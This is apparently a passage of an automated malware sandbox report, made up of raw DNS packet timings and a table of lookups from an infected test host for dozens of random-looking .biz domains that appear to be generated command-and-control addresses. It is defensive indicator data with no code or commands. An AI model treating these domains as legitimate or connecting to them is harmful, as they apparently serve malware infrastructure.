                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.725990057 CET53553551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.788281918 CET5784353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.799467087 CET53578431.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.885560036 CET5416653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.894359112 CET53541661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.189166069 CET5361253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.198309898 CET53536121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.267302036 CET5118753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.275422096 CET53511871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.019802094 CET5354153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.027291059 CET53535411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.978578091 CET5088953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.986701965 CET53508891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.879770994 CET6135253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.980597973 CET53613521.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.685522079 CET6540653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.693406105 CET53654061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.693969011 CET6267453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.701518059 CET53626741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.747245073 CET5213353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.756433964 CET53521331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.718594074 CET6335153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.726793051 CET53633511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.506292105 CET5557153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.514970064 CET53555711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.062402964 CET6308353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.073811054 CET53630831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.364620924 CET6328953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.372435093 CET53632891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.389167070 CET5972753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.397151947 CET53597271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.219027042 CET6412753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.226758003 CET53641271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.540184975 CET5358753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.550136089 CET53535871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.740787983 CET5470453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.748645067 CET53547041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.910320997 CET5578853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.919111013 CET53557881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.102371931 CET5611353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.110955954 CET53561131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.785486937 CET5582153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.793451071 CET53558211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.551800013 CET4988653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.560046911 CET53498861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.201894999 CET5143353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.210469961 CET53514331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.689502954 CET5974953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.785109043 CET53597491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.475912094 CET5024553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.483997107 CET53502451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.484841108 CET5012753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.493058920 CET53501271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.775547981 CET5271653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.785861969 CET53527161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.776446104 CET6230653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.784235954 CET53623061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.251075029 CET5101553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.260490894 CET53510151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.811909914 CET5189353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.003324986 CET53518931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.680924892 CET6516753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.691201925 CET53651671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.565598011 CET5937553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.573965073 CET53593751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.014976978 CET5774953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.199928045 CET53577491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.101701975 CET5416353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.109776974 CET53541631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.094786882 CET6048753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.102504015 CET53604871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.805358887 CET5117753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.814157963 CET53511771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.074923038 CET6292253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.082681894 CET53629221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.557455063 CET4976653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.565340996 CET53497661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.644848108 CET5174853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.740974903 CET53517481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166555882 CET6118753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.174402952 CET53611871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623915911 CET5489953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.632183075 CET53548991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.487735033 CET5027853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.495934963 CET53502781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.455554008 CET5382153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.464612961 CET53538211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.315362930 CET6076253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.323558092 CET53607621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.996640921 CET5174553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.099559069 CET53517451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.086139917 CET6359153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.197026968 CET53635911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.044686079 CET5208853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.054071903 CET53520881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.910712957 CET6543053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.920118093 CET53654301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.762322903 CET5455353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.770437002 CET53545531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.443490028 CET5529253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.542237997 CET53552921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.248677969 CET5627953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.256829977 CET53562791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.257546902 CET5288553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.265923977 CET53528851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.685652971 CET6487953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.693552017 CET53648791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.370913982 CET5647553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.378562927 CET53564751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.847146034 CET6172653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.856312037 CET53617261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.026891947 CET5383853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.036345959 CET53538381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.429688931 CET5640153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.438015938 CET53564011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.328474998 CET6252753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.336643934 CET53625271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.035124063 CET5088153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.043911934 CET53508811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.198080063 CET6126053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.206911087 CET53612601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.050115108 CET5878253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.057800055 CET53587821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.047629118 CET5083953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.056907892 CET53508391.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.113347054 CET192.168.2.41.1.1.10xac5cStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.261127949 CET192.168.2.41.1.1.10xb4ddStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.311547995 CET192.168.2.41.1.1.10xd859Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.236902952 CET192.168.2.41.1.1.10x3feeStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.761578083 CET192.168.2.41.1.1.10xbd87Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.719840050 CET192.168.2.41.1.1.10x8881Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.919311047 CET192.168.2.41.1.1.10xe506Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.898142099 CET192.168.2.41.1.1.10x1700Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.083473921 CET192.168.2.41.1.1.10x7f2cStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.567037106 CET192.168.2.41.1.1.10xfc06Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.575917959 CET192.168.2.41.1.1.10xb063Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.193380117 CET192.168.2.41.1.1.10xa4e5Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.201989889 CET192.168.2.41.1.1.10x8f5cStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.212204933 CET192.168.2.41.1.1.10xf59dStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.412399054 CET192.168.2.41.1.1.10x4916Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.509037018 CET192.168.2.41.1.1.10xebe5Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.325082064 CET192.168.2.41.1.1.10xf858Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.878343105 CET192.168.2.41.1.1.10x16c8Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.658814907 CET192.168.2.41.1.1.10x2f3cStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.284729958 CET192.168.2.41.1.1.10xf3b9Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.838498116 CET192.168.2.41.1.1.10xe512Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.963037014 CET192.168.2.41.1.1.10xcbfdStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.779285908 CET192.168.2.41.1.1.10xe309Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.785883904 CET192.168.2.41.1.1.10xe206Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.423860073 CET192.168.2.41.1.1.10xaa55Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.243688107 CET192.168.2.41.1.1.10x90cbStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.574608088 CET192.168.2.41.1.1.10xc1b2Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.559761047 CET192.168.2.41.1.1.10xc1b2Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.671900988 CET192.168.2.41.1.1.10x8da2Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.485505104 CET192.168.2.41.1.1.10x6fe5Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.718117952 CET192.168.2.41.1.1.10x5e28Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.788281918 CET192.168.2.41.1.1.10x1b31Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.885560036 CET192.168.2.41.1.1.10x3632Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.189166069 CET192.168.2.41.1.1.10x3182Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.267302036 CET192.168.2.41.1.1.10xcfcbStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.019802094 CET192.168.2.41.1.1.10x5982Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.978578091 CET192.168.2.41.1.1.10xb50bStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.879770994 CET192.168.2.41.1.1.10x188aStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.685522079 CET192.168.2.41.1.1.10x52b9Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.693969011 CET192.168.2.41.1.1.10x4473Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.747245073 CET192.168.2.41.1.1.10x4da2Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.718594074 CET192.168.2.41.1.1.10x9672Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.506292105 CET192.168.2.41.1.1.10x3dabStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.062402964 CET192.168.2.41.1.1.10xae0eStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.364620924 CET192.168.2.41.1.1.10xc6a9Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.389167070 CET192.168.2.41.1.1.10x5acaStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.219027042 CET192.168.2.41.1.1.10x5f9Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.540184975 CET192.168.2.41.1.1.10x15c7Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.740787983 CET192.168.2.41.1.1.10x819fStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.910320997 CET192.168.2.41.1.1.10xac5Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.102371931 CET192.168.2.41.1.1.10x5e01Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.785486937 CET192.168.2.41.1.1.10xf5c5Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.551800013 CET192.168.2.41.1.1.10xd174Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.201894999 CET192.168.2.41.1.1.10xb380Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.689502954 CET192.168.2.41.1.1.10xc405Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.475912094 CET192.168.2.41.1.1.10x57e6Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.484841108 CET192.168.2.41.1.1.10xefb7Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.775547981 CET192.168.2.41.1.1.10x928dStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.776446104 CET192.168.2.41.1.1.10x6262Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.251075029 CET192.168.2.41.1.1.10x2adStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.811909914 CET192.168.2.41.1.1.10x7b63Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.680924892 CET192.168.2.41.1.1.10xd413Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.565598011 CET192.168.2.41.1.1.10xd1d6Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.014976978 CET192.168.2.41.1.1.10x7388Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.101701975 CET192.168.2.41.1.1.10xb1b4Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.094786882 CET192.168.2.41.1.1.10x47e3Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.805358887 CET192.168.2.41.1.1.10x2c38Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.074923038 CET192.168.2.41.1.1.10xf645Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.557455063 CET192.168.2.41.1.1.10xfa26Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.644848108 CET192.168.2.41.1.1.10x1467Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166555882 CET192.168.2.41.1.1.10x8c62Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623915911 CET192.168.2.41.1.1.10x22dbStandard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.487735033 CET192.168.2.41.1.1.10x71c7Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.455554008 CET192.168.2.41.1.1.10x7d6dStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
